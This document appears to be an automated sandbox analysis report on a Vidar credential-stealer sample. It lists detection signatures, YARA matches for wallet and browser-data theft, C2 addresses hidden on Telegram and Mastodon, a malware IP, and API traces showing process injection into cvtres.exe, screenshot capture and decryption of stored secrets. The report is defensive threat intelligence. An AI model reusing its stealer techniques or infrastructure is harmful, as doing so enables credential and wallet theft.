Windows Analysis Report
uGfpJynSWM

Overview

General Information

Sample Name:uGfpJynSWM (renamed file extension from none to exe)
Analysis ID:679146
MD5:eb84aeef20ea974bf207dd6df8446567
SHA1:624a1e8510a1d7f3ff05693c30d724f19aaf5a1a
SHA256:9f532c8749bc71b3fc723d42f86300ae5a583515817da2aad40c858f163d01f8
Tags:exe
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Yara detected Vidar stealer
Antivirus detection for URL or domain
Writes to foreign memory regions
.NET source code references suspicious native API functions
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • uGfpJynSWM.exe (PID: 6360 cmdline: "C:\Users\user\Desktop\uGfpJynSWM.exe" MD5: EB84AEEF20EA974BF207DD6DF8446567)
    • cvtres.exe (PID: 6392 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe MD5: C09985AE74F0882F208D75DE27770DFA)
  • cleanup
{"C2 url": ["https://t.me/korstonsales", "https://climatejustice.social/@ffoleg94"]}
Source | Rule | Description | Author | Strings
00000000.00000002.336204598.0000000002BEF000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
00000000.00000002.336204598.0000000002BEF000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Vidar_114258d5 | unknown | unknown
  • 0xcae6:$a2: *wallet*.dat
  • 0xcd09:$b1: CC\%s_%s.txt
  • 0xcd51:$b2: History\%s_%s.txt
  • 0xcd39:$b3: Autofill\%s_%s.txt
00000001.00000000.334513678.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
00000001.00000000.334513678.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Vidar_114258d5 | unknown | unknown
  • 0x3ee76:$a2: *wallet*.dat
  • 0x3f099:$b1: CC\%s_%s.txt
  • 0x3f0e1:$b2: History\%s_%s.txt
  • 0x3f0c9:$b3: Autofill\%s_%s.txt
00000001.00000000.334068069.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security

Source | Rule | Description | Author | Strings
0.2.uGfpJynSWM.exe.3be5530.2.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
0.2.uGfpJynSWM.exe.3be5530.2.unpack | Windows_Trojan_Vidar_114258d5 | unknown | unknown
  • 0x3d676:$a2: *wallet*.dat
  • 0x3d899:$b1: CC\%s_%s.txt
  • 0x3d8e1:$b2: History\%s_%s.txt
  • 0x3d8c9:$b3: Autofill\%s_%s.txt
1.0.cvtres.exe.400000.3.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
1.0.cvtres.exe.400000.3.raw.unpack | Windows_Trojan_Vidar_114258d5 | unknown | unknown
  • 0x3ee76:$a2: *wallet*.dat
  • 0x3f099:$b1: CC\%s_%s.txt
  • 0x3f0e1:$b2: History\%s_%s.txt
  • 0x3f0c9:$b3: Autofill\%s_%s.txt
1.0.cvtres.exe.400000.4.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security

No Sigma rule has matched
No Snort rule has matched

              AV Detection

              Source: uGfpJynSWM.exe, Virustotal: Detection: 67%
              Source: uGfpJynSWM.exe, Metadefender: Detection: 31%
              Source: uGfpJynSWM.exe, ReversingLabs: Detection: 80%
              Source: http://45.159.249.4/1474h.dll, Avira URL Cloud: Label: malware
              Source: http://45.159.249.4/1474stem32, Avira URL Cloud: Label: malware
              Source: http://45.159.249.4/1474N, Avira URL Cloud: Label: malware
              Source: http://45.159.249.4/=:, Avira URL Cloud: Label: malware
              Source: https://climatejustice.social/@ffoleg94, Avira URL Cloud: Label: malware
              Source: http://45.159.249.4/1474, Avira URL Cloud: Label: malware
              Source: http://45.159.249.4/147474R, Avira URL Cloud: Label: malware
              Source: http://45.159.249.4/1474b, Avira URL Cloud: Label: malware
              Source: http://45.159.249.4/1474l, Avira URL Cloud: Label: malware
              Source: http://45.159.249.4/1474u, Avira URL Cloud: Label: malware
              Source: http://45.159.249.4/1474x, Avira URL Cloud: Label: malware
              Source: http://45.159.249.4:80, Avira URL Cloud: Label: malware
              Source: uGfpJynSWM.exe, Joe Sandbox ML: detected
              Source: 1.0.cvtres.exe.400000.0.unpack, Avira: Label: TR/AD.GenSteal.nsaqr
              Source: 1.0.cvtres.exe.400000.3.unpack, Avira: Label: TR/AD.GenSteal.nsaqr
              Source: 1.0.cvtres.exe.400000.4.unpack, Avira: Label: TR/AD.GenSteal.nsaqr
              Source: 1.0.cvtres.exe.400000.2.unpack, Avira: Label: TR/AD.GenSteal.nsaqr
              Source: 1.0.cvtres.exe.400000.1.unpack, Avira: Label: TR/AD.GenSteal.nsaqr
              Source: 1.0.cvtres.exe.400000.5.unpack, Avira: Label: TR/AD.GenSteal.nsaqr
              Source: 1.0.cvtres.exe.400000.0.unpack, Malware Configuration Extractor: Vidar {"C2 url": ["https://t.me/korstonsales", "https://climatejustice.social/@ffoleg94"]}
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0040B7EC lstrcatA,lstrcatA,lstrcatA,CloseHandle,Sleep,OpenEventA,CreateEventA,lstrcatA,lstrcatA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,Sleep,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,CreateThread,CreateThread,Sleep,Sleep,CloseHandle,1_2_0040B7EC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0040E80D _malloc,_memmove,_malloc,CryptUnprotectData,_memmove,1_2_0040E80D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0040E3F0 _memset,lstrlen,CryptStringToBinaryA,_memmove,lstrcatA,lstrcatA,1_2_0040E3F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0040E575 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_0040E575
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0040E5CE CryptUnprotectData,LocalAlloc,_memmove,LocalFree,1_2_0040E5CE
              Source: uGfpJynSWM.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49765 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 167.86.107.75:443 -> 192.168.2.7:49766 version: TLS 1.2
              Source: uGfpJynSWM.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: VBZXBVZXBNSDMHBDSJ67327632.pdb source: uGfpJynSWM.exe
              Source: Binary string: VBZXBVZXBNSDMHBDSJ67327632.pdbh) source: uGfpJynSWM.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0041208D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,lstrcatA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,_memset,_memset,_memset,_memset,_memset,_memset,FindNextFileA,FindClose,_memset,lstrcatA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,1_2_0041208D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0040C955 lstrcatA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,GetFileAttributesA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,1_2_0040C955
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_00411117 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,FindNextFileA,FindClose,1_2_00411117
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_004101E9 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_sprintf,_memset,wsprintfA,StrCmpCA,StrCmpCA,GetFileAttributesA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_004101E9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_004162AB __EH_prolog3_GS,FindFirstFileW,FindNextFileW,1_2_004162AB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_00408B15 __EH_prolog3_GS,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,_memset,lstrcatA,lstrlen,1_2_00408B15
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0041048F wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0041048F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0040954D wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,lstrcpy,lstrcatA,lstrcatA,StrCmpCA,wsprintfA,wsprintfA,lstrlen,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcatA,PathFindFileNameA,lstrcatA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,lstrcpy,lstrcatA,lstrcatA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,CoInitialize,PathMatchSpecA,lstrcpy,PathMatchSpecA,lstrcpy,FindNextFileA,FindClose,1_2_0040954D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_00411DA6 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,_memset,lstrcatA,lstrcatA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,1_2_00411DA6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_00409ADF lstrcatA,lstrcatA,lstrcatA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,1_2_00409ADF
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_013BE430
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_013BE800
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_013BD728
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_013BD71E

              Networking

              Source: Malware configuration extractor, URLs: https://t.me/korstonsales
              Source: Malware configuration extractor, URLs: https://climatejustice.social/@ffoleg94
              Source: Joe Sandbox View, ASN Name: CONTABODE CONTABODE
              Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global traffic, HTTP traffic detected: GET /korstonsales HTTP/1.1 Host: t.me
              Source: global traffic, HTTP traffic detected: GET /@ffoleg94 HTTP/1.1 Host: climatejustice.social
              Source: Joe Sandbox View, IP Address: 167.86.107.75
              Source: Joe Sandbox View, IP Address: 149.154.167.99
              Source: unknownTCP traffic detected without corresponding DNS query: 45.159.249.4
              Source: cvtres.exe, 00000001.00000003.525955386.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.340436007.0000000004D01000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.572125764.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.479685777.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.386980069.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.433280864.0000000004D4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
              Source: cvtres.exe, 00000001.00000003.525955386.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.341096016.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.526436186.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.433793618.0000000004D4E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.480140552.0000000004D59000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.387373494.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.572535033.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://funk.climatejustice.global
              Source: cvtres.exe, 00000001.00000003.572535033.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mastodon/mastodon
              Source: cvtres.exe, 00000001.00000003.525955386.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.341096016.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.526436186.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.433793618.0000000004D4E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.480140552.0000000004D59000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.387373494.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.572535033.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://joinmastodon.org/
              Source: cvtres.exe, 00000001.00000003.572535033.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://joinmastodon.org/apps
              Source: uGfpJynSWM.exe, 00000000.00000002.336204598.0000000002BEF000.00000004.00000800.00020000.00000000.sdmp, uGfpJynSWM.exe, 00000000.00000002.336360720.0000000003BE1000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, cvtres.exe, 00000001.00000003.525955386.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000000.334513678.0000000000400000.00000040.00000400.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.340436007.0000000004D01000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.572125764.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.594456263.0000000004D0D000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.340494604.0000000004D0E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, cvtres.exe, 00000001.00000000.333395548.0000000000400000.00000040.00000400.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.594439750.0000000004D06000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.479685777.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.386980069.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.433280864.0000000004D4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/korstonsales
              Source: uGfpJynSWM.exe, 00000000.00000002.336204598.0000000002BEF000.00000004.00000800.00020000.00000000.sdmp, uGfpJynSWM.exe, 00000000.00000002.336360720.0000000003BE1000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000001.00000000.334513678.0000000000400000.00000040.00000400.00020000.00000000.sdmp, cvtres.exe, 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, cvtres.exe, 00000001.00000000.333395548.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/korstonsaleshttps://climatejustice.social/
              Source: cvtres.exe, 00000001.00000003.340494604.0000000004D0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/korstonsalesi
              Source: cvtres.exe, 00000001.00000003.433280864.0000000004D4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telegram.org/img/t_logo.png
              Source: cvtres.exe, 00000001.00000003.386988114.0000000004D4E000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000001.00000003.433280864.0000000004D4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
              Source: uGfpJynSWM.exeString found in binary or memory: https://www.digicert.com/CPS0
              Source: unknownDNS traffic detected: queries for: t.me
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_0040A1C1 DeleteUrlCacheEntry,DeleteUrlCacheEntry,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,1_2_0040A1C1
              Source: global trafficHTTP traffic detected: GET /korstonsales HTTP/1.1Host: t.me
              Source: global trafficHTTP traffic detected: GET /@ffoleg94 HTTP/1.1Host: climatejustice.social
              Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49765 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 167.86.107.75:443 -> 192.168.2.7:49766 version: TLS 1.2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_004166F5 GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,1_2_004166F5
              Source: uGfpJynSWM.exe, 00000000.00000002.335835109.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

              System Summary

              Source: 0.2.uGfpJynSWM.exe.3be5530.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: 1.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: 1.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: 1.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: 1.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: 1.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: 0.2.uGfpJynSWM.exe.3be5530.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: 1.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: 1.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: 1.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: 1.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: 1.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: 1.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: 1.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: 00000000.00000002.336204598.0000000002BEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: 00000001.00000000.334513678.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: 00000001.00000000.334068069.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: 00000001.00000000.333395548.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: 00000001.00000000.333726198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: 00000000.00000002.336360720.0000000003BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: Process Memory Space: uGfpJynSWM.exe PID: 6360, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: Process Memory Space: cvtres.exe PID: 6392, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
              Source: uGfpJynSWM.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: 0.2.uGfpJynSWM.exe.3be5530.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: String function: 0042083E appears 34 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: String function: 00403B11 appears 80 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: String function: 00427300 appears 47 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: String function: 004207D5 appears 39 times
              Source: uGfpJynSWM.exe, 00000000.00000002.335835109.0000000000EE9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs uGfpJynSWM.exe
              Source: uGfpJynSWM.exe, 00000000.00000000.326996035.0000000000884000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVBZXBVZXBNSDMHBDSJ67327632.exeV vs uGfpJynSWM.exe
              Source: uGfpJynSWM.exeBinary or memory string: OriginalFilenameVBZXBVZXBNSDMHBDSJ67327632.exeV vs uGfpJynSWM.exe
              Source: uGfpJynSWM.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: uGfpJynSWM.exeStatic PE information: invalid certificate
              Source: uGfpJynSWM.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: uGfpJynSWM.exeVirustotal: Detection: 67%
              Source: uGfpJynSWM.exeMetadefender: Detection: 31%
              Source: uGfpJynSWM.exeReversingLabs: Detection: 80%
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknownProcess created: C:\Users\user\Desktop\uGfpJynSWM.exe "C:\Users\user\Desktop\uGfpJynSWM.exe"
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\uGfpJynSWM.exe.log
              Source: classification engineClassification label: mal100.troj.evad.winEXE@3/1@2/3
              Source: uGfpJynSWM.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 1_2_00415A22 __EH_prolog3_GS,CreateToolhelp32Snapshot,Process32First,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,Process32Next,CloseHandle,1_2_00415A22
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: uGfpJynSWM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: uGfpJynSWM.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: uGfpJynSWM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: VBZXBVZXBNSDMHBDSJ67327632.pdb source: uGfpJynSWM.exe
              Source: Binary string: VBZXBVZXBNSDMHBDSJ67327632.pdbh) source: uGfpJynSWM.exe
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B131D push ds; iretd 0_2_013B131F
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B123F push ds; iretd 0_2_013B1240
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B127C push ds; iretd 0_2_013B1282
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B126A push ds; iretd 0_2_013B126B
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B1A65 push ss; iretd 0_2_013B1A67
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B1A4E push ss; iretd 0_2_013B1A50
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B12A7 push ds; iretd 0_2_013B12AD
              Source: C:\Users\user\Desktop\uGfpJynSWM.exeCode function: 0_2_013B1A99 push ss; iretd 0_2_013B1A9A
